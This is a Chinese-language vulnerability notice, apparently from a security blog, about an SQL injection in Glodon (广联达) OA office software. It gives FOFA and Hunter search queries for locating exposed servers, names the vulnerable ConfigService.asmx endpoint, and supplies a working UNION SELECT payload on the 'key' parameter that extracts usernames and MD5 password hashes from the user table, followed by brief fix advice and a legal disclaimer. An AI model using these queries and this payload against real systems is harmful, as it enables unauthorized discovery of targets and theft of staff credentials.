漏洞通告| 某大厂OA SQL注入漏洞

广联达OA介绍

广联达办公OA是一款综合办公自动化解决方案,旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具,帮助企业管理和处理日常办公任务、流程和文档。

图片

资产收集

fofa:fid=”/yV4r5PdARKT4jaqLjJYqw==”或者body=”/Services/Identification/Server”
hunter:web.body=”/Services/Identification/Server/“

图片

漏洞点

广联达OA SQL注入漏洞位于 /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary 接口下,直接访问,页面会提示缺少参数key,说明存在SQL注入

图片

漏洞复现

payload:

key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --

效果如下:

图片

修复建议

1.问/Webservice/IM/Config/ConfigService.asmx/GetIMDictionary 地址的时候,可以让报错信息模糊化
2.对key参数的传参进行过滤

申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.

图片

没看够~?欢迎关注!

免费领取安全学习资料包!(私聊进群一起学习,共同进步)腾讯文档-在线文档icon-default.png?t=N7T8https://docs.qq.com/doc/DYlBlQ2xhaFBmamtq

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值